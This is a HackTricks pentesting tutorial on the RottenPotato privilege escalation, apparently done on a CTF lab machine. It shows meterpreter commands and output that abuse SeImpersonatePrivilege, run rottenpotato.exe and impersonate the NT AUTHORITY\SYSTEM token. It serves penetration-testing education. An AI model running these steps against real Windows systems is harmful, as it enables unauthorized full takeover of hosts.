HackTricks
Search…
👽
Network Services Pentesting
RottenPotato
Support HackTricks and get benefits!
A digital transformation tailored to your organization is unique. It also comes with its risks. Defend yourself against hackers. Get protection before it's too late. Talk to the professionals at Securityboat:
Let's connect - Securityboat
Securityboat - Frontline of Your Business
The info in this page info was extracted from this post
Service accounts usually have special privileges (SeImpersonatePrivileges) and this could be used to escalate privileges.
I won’t go into the details on how this exploit works, the article above explains it far better than I ever could.
Let’s check our privileges with meterpreter:
1
meterpreter > getprivs
2
3
Enabled Process Privileges
4
==========================
5
6
Name
7
----
8
SeAssignPrimaryTokenPrivilege
9
SeChangeNotifyPrivilege
10
SeCreateGlobalPrivilege
11
SeImpersonatePrivilege
12
SeIncreaseQuotaPrivilege
13
SeIncreaseWorkingSetPrivilege
Copied!
Excellent, it looks like we have the privileges we need to perform the attack. Let’s upload rottenpotato.exe
Back on our meterpreter session we load the incognito extension.
1
meterpreter > use incognito
2
Loading extension incognito...Success.
3
meterpreter > list_tokens -u
4
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
5
Call rev2self if primary process token is SYSTEM
6
7
Delegation Tokens Available
8
========================================
9
NT SERVICE\SQLSERVERAGENT
10
NT SERVICE\SQLTELEMETRY
11
TALLY\Sarah
12
13
Impersonation Tokens Available
14
========================================
15
No tokens available
Copied!
We can see we currently have no Impersonation Tokens. Let’s run the Rotten Potato exploit.
1
meterpreter > execute -f rottenpotato.exe -Hc
2
Process 3104 created.
3
Channel 2 created.
4
meterpreter > list_tokens -u
5
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
6
Call rev2self if primary process token is SYSTEM
7
8
Delegation Tokens Available
9
========================================
10
NT SERVICE\SQLSERVERAGENT
11
NT SERVICE\SQLTELEMETRY
12
TALLY\Sarah
13
14
Impersonation Tokens Available
15
========================================
16
NT AUTHORITY\SYSTEM
Copied!
We need to quickly impersonate the token or it will disappear.
1
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
2
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
3
Call rev2self if primary process token is SYSTEM
4
[-] No delegation token available
5
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
6
meterpreter > getuid
7
Server username: NT AUTHORITY\SYSTEM
Copied!
Success! We have our SYSTEM shell and can grab the root.txt file!
A digital transformation tailored to your organization is unique. It also comes with its risks. Defend yourself against hackers. Get protection before it's too late. Talk to the professionals at Securityboat:
Let's connect - Securityboat
Securityboat - Frontline of Your Business
Support HackTricks and get benefits!
Copy link